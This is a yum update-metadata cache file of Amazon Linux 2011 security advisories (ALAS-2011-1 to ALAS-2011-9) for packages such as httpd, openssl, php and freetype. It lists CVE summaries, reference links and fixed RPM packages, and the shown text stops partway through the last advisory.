File: /var/cache/yum/x86_64/latest/amzn-updates/gen/updateinfo.xml
<?xml version="1.0" ?>
<updates><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-1</id><title>Amazon Linux AMI 2011.09 - ALAS-2011-1: medium priority package update for httpd</title><issued date="2011-09-27 22:46:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-3192:
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192" title="" id="CVE-2011-3192" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1245.html" title="" id="RHSA-2011:1245" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.18.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.21" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.21-1.18.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-2</id><title>Amazon Linux - ALAS-2011-2: important priority package update for cyrus-imapd</title><issued date="2011-10-10 22:29:00" /><updated date="2014-09-14 14:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3208:
Stack-based buffer overflow in the split_wildmats function in nntpd.c in nntpd in Cyrus IMAP Server before 2.3.17 and 2.4.x before 2.4.11 allows remote attackers to execute arbitrary code via a crafted NNTP command.
A buffer overflow flaw was found in the cyrus-imapd NNTP server, nntpd. A remote user able to use the nntpd service could use this flaw to crash the nntpd child process or, possibly, execute arbitrary code with the privileges of the cyrus user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3208" title="" id="CVE-2011-3208" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1317.html" title="" id="RHSA-2011:1317" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.3.16-6.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-3</id><title>Amazon Linux - ALAS-2011-3: medium priority package update for 
ca-certificates</title><issued date="2011-10-10 22:31:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2011:1248.html" title="" id="RHSA-2011:1248" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ca-certificates" version="2010.63" release="3.7.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2010.63-3.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-4</id><title>Amazon Linux - ALAS-2011-4: medium priority package update for openssl</title><issued date="2011-10-10 23:40:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3207:
crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past.
An uninitialized variable use flaw was found in OpenSSL. This flaw could cause an application using the OpenSSL Certificate Revocation List (CRL) checking functionality to incorrectly accept a CRL that has a nextUpdate date in the past.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3207" title="" id="CVE-2011-3207" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-5</id><title>Amazon Linux - ALAS-2011-5: medium priority package update for perl-FCGI</title><issued date="2011-10-10 23:48:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2766:
The FCGI (aka Fast CGI) module 0.70 through 0.73 for Perl, as used by CGI::Fast, uses environment variable values from one request during processing of a later request, which allows remote attackers to bypass authentication via crafted HTTP headers.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2766" title="" id="CVE-2011-2766" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-FCGI-debuginfo" version="0.74" release="1.0.amzn1" epoch="1" arch="i686"><filename>Packages/perl-FCGI-debuginfo-0.74-1.0.amzn1.i686.rpm</filename></package><package name="perl-FCGI" version="0.74" release="1.0.amzn1" epoch="1" arch="i686"><filename>Packages/perl-FCGI-0.74-1.0.amzn1.i686.rpm</filename></package><package name="perl-FCGI-debuginfo" version="0.74" release="1.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-FCGI-debuginfo-0.74-1.0.amzn1.x86_64.rpm</filename></package><package name="perl-FCGI" version="0.74" release="1.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-FCGI-0.74-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-6</id><title>Amazon Linux - ALAS-2011-6: medium priority package update for openswan</title><issued date="2011-10-10 23:54:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3380:
Openswan 2.6.29 through 2.6.35 allows remote attackers to cause a denial of service (NULL pointer dereference and pluto IKE daemon crash) via an ISAKMP message with an invalid KEY_LENGTH attribute, which is not properly handled by the error handling function.
A NULL pointer dereference flaw was found in the way Openswan's pluto IKE daemon handled certain error conditions. A remote, unauthenticated attacker could send a specially-crafted IKE packet that would crash the pluto daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3380" title="" id="CVE-2011-3380" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1356.html" title="" id="RHSA-2011:1356" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openswan-debuginfo" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.36-1.12.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.36-1.12.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.36-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-7</id><title>Amazon Linux - ALAS-2011-7: important priority package update for php</title><issued date="2011-10-11 00:07:00" /><updated date="2014-09-14 14:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3379:
php: changes to is_a() in 5.3.7 may allow arbitrary code execution with certain code
The is_a function in PHP 5.3.7 and 5.3.8 triggers a call to the __autoload function, which makes it easier for remote attackers to execute arbitrary code by providing a crafted URL and leveraging potentially unsafe behavior in certain PEAR packages and custom autoloaders.
CVE-2011-3182:
PHP before 5.3.7 does not properly check the return values of the malloc, calloc, and realloc library functions, which allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger a buffer overflow by leveraging the ability to provide an arbitrary value for a function argument, related to (1) ext/curl/interface.c, (2) ext/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4) ext/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6) ext/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8) ext/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10) TSRM/tsrm_win32.c, and (11) the strtotime function.
CVE-2011-2483:
crypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain platforms, PostgreSQL before 8.4.9, and other products, does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.
A signedness issue was found in the way the crypt() function in the PostgreSQL pgcrypto module handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
A signedness issue was found in the way the PHP crypt() function handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
CVE-2011-2202:
The rfc1867_post_handler function in main/rfc1867.c in PHP before 5.3.7 does not properly restrict filenames in multipart/form-data POST requests, which allows remote attackers to conduct absolute path traversal attacks, and possibly create or overwrite arbitrary files, via a crafted upload request, related to a 'file path injection vulnerability.'
An off-by-one flaw was found in PHP. If an attacker uploaded a file with a specially-crafted file name it could cause a PHP script to attempt to write a file to the root (/) directory. By default, PHP runs as the "apache" user, preventing it from writing to the root directory.
CVE-2011-1938:
Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for a UNIX socket.
A stack-based buffer overflow flaw was found in the way the PHP socket extension handled long AF_UNIX socket addresses. An attacker able to make a PHP script connect to a long AF_UNIX socket address could use this flaw to crash the PHP interpreter.
CVE-2011-1148:
Use-after-free vulnerability in the substr_replace function in PHP 5.3.6 and earlier allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact by using the same variable for multiple arguments.
A use-after-free flaw was found in the PHP substr_replace() function. If a PHP script used the same variable as multiple function arguments, a remote attacker could possibly use this to crash the PHP interpreter or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148" title="" id="CVE-2011-1148" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938" title="" id="CVE-2011-1938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202" title="" id="CVE-2011-2202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483" title="" id="CVE-2011-2483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3182" title="" id="CVE-2011-3182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3379" title="" id="CVE-2011-3379" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-cli" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.8" 
release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.8" release="3.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-tidy-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-zts" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-zts-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.8" release="3.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-process-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-zts" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-zts-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.8" release="3.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-mcrypt-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.8" release="3.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-imap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-8</id><title>Amazon Linux - ALAS-2011-8: important priority package update for freetype</title><issued date="2011-10-31 18:18:00" /><updated date="2014-09-14 14:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3256:
Multiple input validation flaws were found in the way FreeType processed bitmap font files. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
FreeType 2 before 2.4.7, as used in CoreGraphics in Apple iOS before 5, Mandriva Enterprise Server 5, and possibly other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted font, a different vulnerability than CVE-2011-0226.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3256" title="" id="CVE-2011-3256" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1402.html" title="" id="RHSA-2011:1402" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype-devel" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-9</id><title>Amazon Linux - ALAS-2011-9: medium priority package update for httpd</title><issued 
date="2011-10-31 18:19:00" /><updated date="2014-09-14 14:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3368:
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker.
CVE-2011-3348:
The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
It was discovered that mod_proxy_ajp incorrectly returned an "Internal Server Error" response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed.
